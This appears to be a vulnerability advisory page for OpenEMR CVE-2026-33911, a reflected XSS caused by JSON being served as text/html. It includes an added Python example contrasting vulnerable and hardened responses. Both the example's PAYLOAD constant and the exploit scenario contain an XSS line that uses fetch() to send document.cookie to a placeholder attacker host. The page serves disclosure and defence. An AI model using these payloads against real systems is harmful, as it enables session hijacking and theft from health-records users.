OpenEMR CVE-2026-33911

MEDIUM 5.4 (CVSS 3.1 · GitHub Advisory)
Cross-site Scripting (XSS) (CWE-79)
2026-03-25 · GitHub_M

Severity by source

GitHub Advisory PRIMARY
5.4 MEDIUM
AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS Vector (GitHub Advisory)

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: Required
Scope: Changed
Confidentiality: Low
Integrity: Low
Availability: None

Lifecycle Timeline

CVE Published: Mar 25, 2026 22:44 (nvd)
Analysis Generated: Mar 25, 2026 23:02 (vuln.today)

Description (GitHub Advisory)

OpenEMR is a free and open source electronic health records and medical practice management application. Prior to version 8.0.0.3, the POST parameter title is reflected back in a JSON response built with json_encode(). Because the response is served with a text/html Content-Type, the browser interprets injected HTML/script tags rather than treating the output as JSON. An authenticated attacker can craft a request that executes arbitrary JavaScript in a victim's session. Version 8.0.0.3 contains a fix.
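The following is an added example, not OpenEMR's code, that models the pattern the advisory describes: a JSON body that echoes the attacker-controlled title field, served once under text/html (vulnerable) and once under application/json with nosniff and JSON_HEX_TAG-style escaping (hardened), plus a classifier that decides whether a browser would parse a given response as HTML. Python's json.dumps stands in for PHP's json_encode(): with default flags neither escapes '<' or '>', so the tag in the reflected value survives serialisation unchanged. The function names, the attacker.example host and the payload are assumptions for illustration.

```python
"""Added example (not OpenEMR's code): JSON reflected under text/html versus
under application/json.  json.dumps stands in for PHP's json_encode(); with
default flags neither escapes '<' or '>'."""
import json
import re
from typing import Dict, Tuple

# Constructed payload in the shape of the exploit scenario on this page
# (attacker.example is a placeholder host, not a real endpoint).
PAYLOAD = ('<img src=x onerror="fetch(\'https://attacker.example/steal?c=\''
           '+document.cookie)">')

# Substitutions equivalent to PHP's JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS.
# None of these characters is structural in JSON, so they can be rewritten
# after serialisation: a JSON parser decodes the \uXXXX forms back to the
# original characters, while an HTML parser never sees a '<' to open a tag.
_HEX = {"<": "\\u003C", ">": "\\u003E", "&": "\\u0026", "'": "\\u0027"}


def json_hex_escape(serialized: str) -> str:
    return "".join(_HEX.get(ch, ch) for ch in serialized)


def build_response(title: str, hardened: bool) -> Tuple[Dict[str, str], str]:
    """Return (headers, body) for a JSON reply that echoes the title field."""
    body = json.dumps({"status": "ok", "title": title})
    if not hardened:
        # The vulnerable shape from the advisory: JSON text, HTML media type.
        return {"Content-Type": "text/html; charset=utf-8"}, body
    return (
        {
            # Correct media type: the browser displays the body as text and
            # does not execute anything in it.
            "Content-Type": "application/json; charset=utf-8",
            # Stops content sniffing should the type ever be dropped upstream.
            "X-Content-Type-Options": "nosniff",
        },
        # Defence in depth: even if a later change embeds this JSON inside an
        # HTML page, the escaped form cannot open a tag.
        json_hex_escape(body),
    )


_TAG = re.compile(r"<\s*/?[A-Za-z]")


def media_type(headers: Dict[str, str]) -> str:
    """'text/html; charset=utf-8' -> 'text/html' (header name case-insensitive)."""
    for name, value in headers.items():
        if name.lower() == "content-type":
            return value.split(";", 1)[0].strip().lower()
    return ""


def browser_executes_markup(headers: Dict[str, str], body: str) -> bool:
    """True when a browser would parse the body as HTML and a tag is present.

    application/json and text/plain bodies are displayed, not parsed, so the
    same tag text in them is inert; that distinction is what the fix relies on.
    """
    return media_type(headers) == "text/html" and _TAG.search(body) is not None


def decoded_title(body: str) -> str:
    """What a legitimate JSON consumer receives; escaping must not change it."""
    return json.loads(body)["title"]


if __name__ == "__main__":
    for hardened in (False, True):
        headers, body = build_response(PAYLOAD, hardened)
        verdict = "script runs" if browser_executes_markup(headers, body) else "inert"
        print("hardened" if hardened else "vulnerable", headers["Content-Type"], "->", verdict)
        print("  body:", body)
```

Running the block prints the two responses side by side: the bodies differ only in escaping, and the text/html one is the only one a browser would execute. The same classifier can be pointed at a captured response from a real instance by passing its headers and body; the page does not name the affected endpoint, so no request URL is assumed here.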

Analysis (AI)

This is a reflected cross-site scripting (XSS) vulnerability in OpenEMR versions prior to 8.0.0.3. The POST parameter 'title' is echoed into a JSON body built with json_encode(), which by default leaves '<' and '>' intact, and that body is served with a text/html Content-Type. Because the media type tells the browser to parse the body as an HTML document, tags inside the reflected value are interpreted and any script in them runs instead of being displayed as data. An authenticated attacker can craft a request that executes arbitrary JavaScript in a victim's session, potentially leading to session hijacking, credential theft, or unauthorized actions within the electronic health records system. …


Vulnerability Assessment (AI)

Risk Assessment The CVSS v3.1 vector (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N) yields a medium score. The endpoint is reachable over the network and the request is trivial to craft, but exploitation needs an authenticated account (PR:L) and a second user's interaction (UI:R). Scope is Changed because the injected script runs in the victim's browser rather than in the vulnerable component, while the confidentiality and integrity impacts are each rated Low and availability is unaffected. …
Exploit Scenario An authenticated attacker with access to the OpenEMR system crafts a malicious POST request whose 'title' parameter carries JavaScript, for example title=<img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">. Because the parameter arrives by POST, the victim (such as an administrator or clinician) has to be induced to send that request while logged in, typically through a link or an auto-submitting form delivered by phishing or social engineering. The JSON response is then parsed as HTML by the victim's browser, the onerror handler fires, and the session cookie is sent to the attacker-controlled server. Cookie theft in this form only works if the session cookie lacks the HttpOnly flag; with HttpOnly set, the script can still issue requests in the victim's session directly. …
Remediation Upgrade OpenEMR to version 8.0.0.3 or later, as confirmed by the vendor release at https://github.com/openemr/openemr/releases/tag/v8_0_0_3. …

Recommended Action (AI)

Within 30 days: Identify affected systems (any OpenEMR instance older than 8.0.0.3) and apply the vendor patch as part of the regular patch cycle; the need for an authenticated account and for victim interaction is what justifies a routine rather than emergency window. Until the upgrade is applied, confirm that the session cookie is set with the HttpOnly flag, which defeats cookie-exfiltration payloads but not other actions a script can take in the victim's session. …
